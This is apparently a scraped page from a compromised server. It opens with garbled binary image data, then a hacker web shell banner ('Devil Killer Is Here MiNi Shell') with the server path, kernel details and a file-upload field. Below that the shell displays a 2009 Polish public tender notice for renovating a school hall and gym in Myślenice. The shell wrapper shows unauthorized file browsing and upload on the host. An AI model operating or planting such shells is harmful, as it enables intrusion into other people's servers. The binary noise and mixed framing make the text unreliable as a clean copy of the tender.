JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090429/127510-N-2009.html

<p class="kh_header"><b>Myślenice: Wykonanie robót budowlanych w ramach  zadania pn. :
Termomodernizacja i modernizacja Zespołu Szkół Ponadgimnazjalnych -  Małopolski Ośrodek Dokształcania i Doskonalenia Zawodowego im. Tytusa Chałubińskiego w Myślenicach  w 2009 r. -  przebudowa i remont auli szkolnej i sali gimnastycznej.</b><br>
<b>Numer ogłoszenia: 127510 - 2009; data zamieszczenia: 29.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ponadgimnazjalnych Małopolski Ośrodek Dokształcania i Doskonalenia Zawodowego w Myślenicach , ul. Zdrojowa 18, 32-400 Myślenice, woj. małopolskie, tel. 012 2720424 w. 106, faks 012 2721246.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www..zsp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna jednostki samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych w ramach  zadania pn. :
Termomodernizacja i modernizacja Zespołu Szkół Ponadgimnazjalnych -  Małopolski Ośrodek Dokształcania i Doskonalenia Zawodowego im. Tytusa Chałubińskiego w Myślenicach  w 2009 r. -  przebudowa i remont auli szkolnej i sali gimnastycznej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie w systemie generalnego wykonawstwa robót budowlanych związanych z przebudową i remontem pomieszczeń  auli szkolnej i sali gimnastycznej.
1.Charakterystyka  przebudowywanych i remontowanych pomieszczeń  :
     a)  Remont i przebudowa  auli szkolnej :
         Powierzchnia całkowita  : 375 m2
         Powierzchnia użytkowa  :  301,08 m2
         Kubatura : 1.230 m3
    b)  Remont i przebudowa sali gimnastycznej :
        Powierzchnia całkowita  : 1.050 m2
        Powierzchnia użytkowa  :  697,78 m2
        Kubatura : 3.194 m3
3.   Roboty wykonywane będą  w czynnym, użytkowanym obiekcie.
4.   Szczegółowy zakres - opis przedmiotu zamówienia określają : projekt budowlano - wykonawczy stanowiący załącznik nr 1 do SIWZ, specyfikacje techniczne wykonania i odbioru robót budowlanych stanowiące załącznik nr 2 do SIWZ , przedmiary robót stanowiące załącznik nr 3 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.45.53.00-7, 45.40.00.00-1, 45.33.00.00-9, 45.31.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.  Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 15.000,00 zł. (słownie: piętnaście tysięcy ), przed upływem terminu składania ofert tzn.  nie później niż do dnia 21.05.2009. do   godz. 10 00
2.  Wadium może być wniesione:
a) w pieniądzu - wyłącznie przelewem na rachunek bankowy wskazany poniżej,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym    że  poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
3. Wykonawca którego oferta nie będzie zabezpieczona jedną z wymienionych form wadium, zostanie wykluczony, zaś ofertę uznaje się za odrzuconą.
4. Wadium w pieniądzu:
a) Wadium w formie przelewu należy wpłacić na konto Zamawiającego : 43 1500 1487 1214 8005 1208 0000 w Kredyt Bank S.A. II Oddział w Krakowie,  z zaznaczeniem, że dotyczy przetargu na: wykonanie robót budowlanych w ramach  inwestycji pn. :Termomodernizacja i modernizacja Zespołu Szkół Ponadgimnazjalnych Myślenicach  w 2009 r.-  przebudowa i remont auli szkolnej i sali gimnastycznej   
b) Za datę wniesienia wadium uznaje się datę uznania rachunku Zamawiającego - do oferty należy załączyć kserokopię przelewu. Zamawiający zastrzega sobie prawo sprawdzenia czasu wpływu  wadium na  swoje konto.
5. Wadium w pozostałych formach dopuszczonych specyfikacją - oryginał należy złożyć w podanym terminie w siedzibie Zamawiającego tj . Zespól Szkół Ponadgimnazjalnych Małopolski Ośrodek Dokształcania i Doskonalenia Zawodowego ul.  Zdrojowa 18, 32-400 Myślenice ( sekretariat ) natomiast  kserokopię należy załączyć do oferty.
6. Wadium składane w tej formie musi mieć datę początkową ważności równą co najmniej terminowi złożenia oferty, a datę końcową ważności upływającą najwcześniej w ostatnim dniu związania ofertą. W razie zawieszenia postępowania lub przedłużenia terminu składania ofert, końcowy termin  ważności wadium, o którym mowa w ust. 2 lit. b), c) ,d) , e) albo zostanie przedłużony przez wykonawcę, albo wniesie on nowe wadium na przedłużony okres.
7.Zamawiający zastrzega, że w razie składania gwarancji lub poręczeń jako wadium, gwarancje oraz  poręczenia powinny być wystawione na Zamawiającego a w treści tych gwarancji i poręczeń nie mogą być żadne postanowienia ograniczające prawo Zamawiającego do ich realizacji. Gwarancje i poręczenia 
muszą określać bezwarunkowe prawo Zamawiającego do ich realizacji. Gwarancje i poręczenia, w których ograniczono prawa Zamawiającego, lub w których uzależniono realizację od spełnienia jakichkolwiek warunków, oprócz wynikających za specyfikacji istotnych warunków zamówienia i  ustawy prawo zamówień publicznych, uznane zostaną jako nie spełniające warunków. 
8.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy , nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
9.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)  odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w  ofercie;
b)  nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)  zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy i złożą oświadczenie, że:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym, i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z Ustawą ( UWAGA!  w przypadku oferty wspólnej warunki wymienione w ust. 1 pkt. d  musi spełnić każdy z Wykonawców indywidualnie );
2.  Zamawiający dokona sprawdzenia spełnienia przez Wykonawców wymogów określonych w ustawie i specyfikacji w zakresie kompletności i jakości oferty, a mianowicie pod uwagę będą brane oferty zawierające: 
a) komplet ważnych oświadczeń i dokumentów wymaganych niniejszą specyfikacją,
b) terminowo oraz prawidłowo wniesione wadium przetargowe
c) wyłącznie prawdziwe informacje mające wpływ na wynik  prowadzonego postępowania oraz 
d) oferty Wykonawców, którzy nie wykonywali czynności związanych z przygotowaniem prowadzonego postępowania, i nie posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności.
3. W zakresie potwierdzenia nie podlegania wykluczeniu na podstawie ustawy pod uwagę będą brane  oferty Wykonawców :
a) którzy w ciągu ostatnich 3 lat przed wszczęciem postępowania nie wyrządzili szkody o której mowa  w art. 24 ust.1 pkt 1 ustawy
b) w stosunku do których nie otwarto likwidacji lub w stosunku do których nie ogłoszono upadłości, z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego (art. 24 ust.1 pkt. 2 ustawy).
c) posiadających aktualny wpis do właściwego rejestru albo do ewidencji działalności gospodarczej i prowadzenie działalności gospodarczej w zakresie robót budowlanych, instalacyjnych.,
d) nie karanych za przestępstwa w zakresie określonym w art. 24 ust. 1 pkt 4-8, a także wobec których sąd orzekł nakaz o którym mowa w art. 24 ust. 1 pkt 9 ustawy
e) nie zalegających z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub posiadających zaświadczenie, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu ( UWAGA! w przypadku oferty wspólnej warunki wymienione w ust. 3 musi spełnić każdy z Wykonawców indywidualnie )
4. W zakresie posiadania niezbędnej wiedzy i doświadczenia oraz potencjału technicznego, a także dysponowania osobami zdolnymi do wykonania zamówienia lub przedstawienia pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,  pod uwagę będą brane oferty  wykonawców :
a) Którzy w zakresie danych dotyczących przeciętnej liczby pracowników dołączą informację o zatrudnianiu w ciągu ostatnich 3 lat, a jeżeli okres działalności jest krótszy - w tym okresie na umowę o pracę - średniorocznie co najmniej 20 pracowników;
b) Którzy w zakresie danych dotyczących osób wykonujących zamówienie udokumentują wymagane prawem budowlanym uprawnienia niezbędne do wykonania zamówienia, tzn. Wykonawców dysponujących osobami posiadającymi uprawnienia do kierowania budową lub robotami  budowlanym  w specjalności :  
- konstrukcyjno - budowlanej;
- instalacyjnej w zakresie instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;
- instalacyjnej w zakresie instalacji i urządzeń elektrycznych ielektroenergetycznych
 Wymagane są:  dokumenty potwierdzające posiadanie wymaganych uprawnień, tj. kopie uprawnień budowlanych oraz aktualne wpisy na listę członków właściwej izby samorządu zawodowego, potwierdzone zaświadczeniem wydanym przez tę izbę z określonym w nim terminem ważności. .  
c) Którzy udokumentują, że kierownik budowy legitymuje się minimum 5-cio letnim stażem pracy licząc od daty wydania uprawnień budowlanych do dnia wyznaczonego przez Zamawiającego na składanie ofert., 
d)   Którzy udokumentują, że kierownicy robót legitymują się minimum 2 letnim stażem pracy w danej specjalności licząc od daty wydania uprawnień budowlanych do dnia wyznaczonego przez Zamawiającego na składanie ofert.
e) Którzy w ciągu ostatnich 5-ciu lat ( a jeżeli okres działalności jest krótszy - w tym okresie )  udokumentują  należyte wykonanie robót budowlanych odpowiadających swoim rodzajem i wartością robotom stanowiącym przedmiot zamówienia. Za wykonanie zamówienia odpowiadającego swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia Zamawiający uważać będzie : 
- wykonanie co najmniej dwóch zamówień dotyczących robót budowlanych związanych z budową,  przebudową lub remontem obiektów kubaturowych o wartości nie mniejszej niż 1.500.000 zł. brutto dla każdego z tych zamówień;
Z dokumentów poświadczających należyte wykonanie zamówienia jak wyżej jednoznacznie musi wynikać jego wartość brutto oraz okres realizacji 
UWAGA! W przypadku złożenia oferty wspólnej warunek wymieniony w ust. 4 pkt e) musi być spełniony samodzielnie przez jednego Wykonawcę - nie sumuje się wartości robót wykonanych przez kilku Wykonawców składających ofertę wspólną.        
5. W zakresie znajdowania się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia pod uwagę będą brane oferty wykonawców którzy:
a) posiadają obrotowe środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 1.000.000 zł.,
b) są ubezpieczeni od odpowiedzialności cywilnej, w zakresie prowadzonej działalności gospodarczej,  na sumę gwarancyjną nie mniejszą niż 1 000 000 zł lub równowartość tej kwoty w walucie obcej wg. średniego kursu NBP na dzień wystawienia polisy. 
UWAGA! W przypadku złożenia oferty wspólnej warunek wymieniony w ust.5 lit. b)  musi spełnić samodzielnie jeden z Wykonawców - nie sumuje się wartości ubezpieczenia kilku Wykonawców składających ofertę wspólną.
6. W celu potwierdzenia, że oferowane roboty budowlane odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający wymaga dołączenia do oferty kosztorysu ofertowego i wstępnego wstępnego harmonogramu rzeczowo - finansowego robót określającego etapy i terminy wykonania robót. Szczegóły w tym zakresie zawiera Rozdział IX SIWZ. 
7. W przypadku oferty wspólnej wyżej określono, które z wymienionych warunków ma spełnić każdy z Wykonawców indywidualnie,  przynajmniej jeden z Wykonawców składający ofertę wspólną, zaś pozostałe warunki o których mowa w niniejszym rozdziale uznane będą uważane za spełnione jeżeli spełnią je razem - łącznie wszyscy wykonawcy występujących wspólnie.
7. W zakresie spełnienia określonych warunków ocena ich spełnienia nastąpi na podstawie przedstawionych przez Wykonawcę oświadczeń i dokumentów, o których mowa w Rozdziale IX
9. Ocena spełnienia powyższych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach na podstawie przedłożonych dokumentów.
10. Zamawiający wzywa Wykonawców w razie zaistnienia przesłanek ustawowych do złożenia określonych oświadczeń lub dokumentów, a także może zażądać w wyznaczonym przez siebie terminie uzupełnienia  lub złożenia wyjaśnień dotyczących treści oferty lub dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu uczestniczenia w postępowaniu Wykonawca powinien przedłożyć ofertę, której wzór stanowi załącznik nr 9 do SIWZ;
2. W celu wykazania spełnienia warunków udziału w postępowaniu określonych w Rozdziale VIII SIWZ, każdy z Wykonawców powinien przedłożyć  wraz z ofertą następujące oświadczenia i dokumenty :
a) Oświadczenie o spełnieniu warunków art. 22 ust. 1 i art. 24 ustawy, stanowiące załącznik nr  4 do niniejszej specyfikacji. 
b) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności  gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
c) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału   Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne,  lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub  wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed  upływem terminu składania ofert;
d) Aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy,  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
e) W przypadku podmiotów zbiorowych w rozumieniu art. 2 ustawy z dnia 28 października 2002 r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz. U. z 2002 r. Nr 197, poz. 1661 z późn. zm.) - aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9  ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
f) Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w  wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu  wykonywanych przez nie czynności - według wzoru 
stanowiącego załącznik nr 5 do specyfikacji;
g) Pisemne zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania  zamówienia, jeżeli w   wykazie, o którym mowa w pkt 3, wykonawca wskazał osoby, którymi będzie dysponował
h) Dokumenty stwierdzające, że osoby, które będą wykonywać zamówienie, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień - wymogi w zakresie   tych uprawnień określa Rozdz. VIII  ust. 4  lit.  b), c), d). Wymagane są  : decyzja o nadaniu uprawnień, zaświadczenie o członkostwie w izbie  samorządu zawodowego,  
 i)    Wykaz wykonanych zamówień z  podaniem ich wartości oraz daty i miejsca wykonania - według wzoru stanowiącego załącznik nr 6 oraz dokumenty potwierdzające, że roboty te zostały wykonane należycie (  wymogi określa Rozdz. VIII ust. 4 lit. e).
 j)   Informacja na temat przeciętnej liczby zatrudnionych pracowników  w okresie ostatnich trzech lat, a w przypadku gdy okres prowadzenia działalności  jest krótszy - w tym okresie, wymogi określa Rozdz. VIII ust. 4 lit. a), sporządzona  według wzoru stanowiącego załącznik nr 7 do SIWZ.
k) Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w 
postępowaniu o udzielenie zamówienia albo składania ofert ( wymogi określa Rozdz. VIII ust.5 lit. a) );
l)  Polisa, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności ( wymogi określa Rozdz. VIII ust.5 lit. b) ).
ł)  Propozycja wstępnego harmonogramu rzeczowo - finansowego robót określającego etapy i terminy wykonania robót wraz z terminami fakturowania każdego etapu robót - z uwzględnieniem terminów określonych w Rozdziale VII siwz. Harmonogram rzeczowo - finansowy robót określa  szczegółowo etapy i terminy wykonania robót wraz z terminami fakturowania każdego etapu robót. Harmonogram  musi być sporządzony z zachowaniem proporcji  wykonanego zakresu robót i wynagrodzenia za tą część do wynagrodzenia należnego za całość robót.  Harmonogram podlegać będzie zatwierdzeniu przez Zamawiającego przed podpisaniem umowy.W razie niezatwierdzenia przedłożonej propozycji harmonogramu rzeczowo - finansowego robót określającego szczegółowo etapy zakres i terminy wykonania robót wraz z terminami fakturowania każdego etapu robót, Wykonawca obowiązany jest przyjąć propozycje zmian tego harmonogramu zaproponowane przez Zamawiającego, jeżeli jest to uzasadnione naruszeniem zasady zachowania proporcji wykonanego zakresu robót do należnego za  całość robót wynagrodzenia, terminem odbioru, zakresem robót, technologią, przewidywanymi warunkami atmosferycznymi albo słusznym interesem  Zamawiającego.
m) Kosztorys ofertowy. Kosztorys ofertowy nie zmienia postanowień specyfikacji i ustalenia, że cena ofertowa jest ceną ryczałtową. Przy opracowaniu kosztorysu ofertowego zachować w miarę możliwości układ, kolejność jak w przedmiarach robót. Zamawiający wymaga aby kosztorys ofertowy zawierał  tabelę elementów scalonych zestawienie materiałów, sprzętu i robocizny, wyszczególnienie składników  kalkulacyjnych ceny tj. : stawki robocizny , kosztów ogólnych i zysku. Kosztorys ofertowy należy opracować metodą kalkulacji szczegółowej. Godzinowa stawka robocizny kosztorysu ofertowego ma być ustalona na podstawie analizy własnej i winna obejmować wszystkie składniki zaliczane do wynagrodzenia oraz koszty pochodne naliczane od wynagrodzeń. Ceny materiałów podaje się łącznie z 
kosztami zakupu. Do uznania wykonawcy pozostawia się naliczanie wskaźników pośrednich i narzutów zysku. Wartość całkowita kosztorysu ofertowego powiększona o należny podatek VAT powinna być równa cenie ryczałtowej podanej w ofercie zaś w razie różnicy uznaje się za właściwą cenę ryczałtowa podaną w ofercie.
3. Ofertę, której mowa w ust. 1 oraz oświadczenie o którym mowa w ust. 2 lit. a) należy przedstawić w formie oryginału, zaś pozostałe dokumenty  należy przedstawić w formie oryginału lub kopii poświadczonej (każda zapisana strona) za zgodność z  oryginałem przez Wykonawcę.
4. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,  składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form, w jakich te dokumenty mogą być składaneDz.U Nr 87, poz.605 z późn.zm.
5. W przypadku oferty wspólnej, do oferty muszą być dołączone także indywidualnie dokumenty i oświadczenie potwierdzające spełnienia przez Wykonawcę warunków określonych w Rozdziale VIII.
6. Na podstawie art. 26 ust. 3 ustawy,  Zamawiający wzywa Wykonawców, którzy w określonym terminie nie złożyli wymaganych przez zamawiającego oświadczeń lub dokumentów, o których mowa w art. 25 ust. 1, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane przez zamawiającego oświadczenia i dokumenty, o których mowa w art. 25 ust. 1, zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo 
ich złożenia oferta wykonawcy podlega odrzuceniu albo konieczne byłoby unieważnienie postępowania. Złożone na wezwanie zamawiającego oświadczenia i dokumenty powinny potwierdzać spełnianie przez wykonawcę warunków udziału w postępowaniu oraz spełnianie przez oferowane dostawy, usługi lub roboty budowlane wymagań określonych przez zamawiającego, nie później niż w dniu, w którym upłynął termin składania wniosków o dopuszczenie do udziału w postępowaniu albo termin składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zsp.edu.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:   Zespół Szkól Ponadgimnazjalnych Małopolski Ośrodek Dokształcania i Doskonalenia Zawodowego ul. Zdrojowa 18, 
32-400 Myślenice.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.05.2009 godzina 10:00, miejsce: 1.Oferty należy składać w siedzibie Zamawiającego tj. ul. Zdrojowa 18, 32-400 Myślenice woj. małopolskie - sekretariat w terminie do dnia: 21.05..2009 r. do godz. 10 oo.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

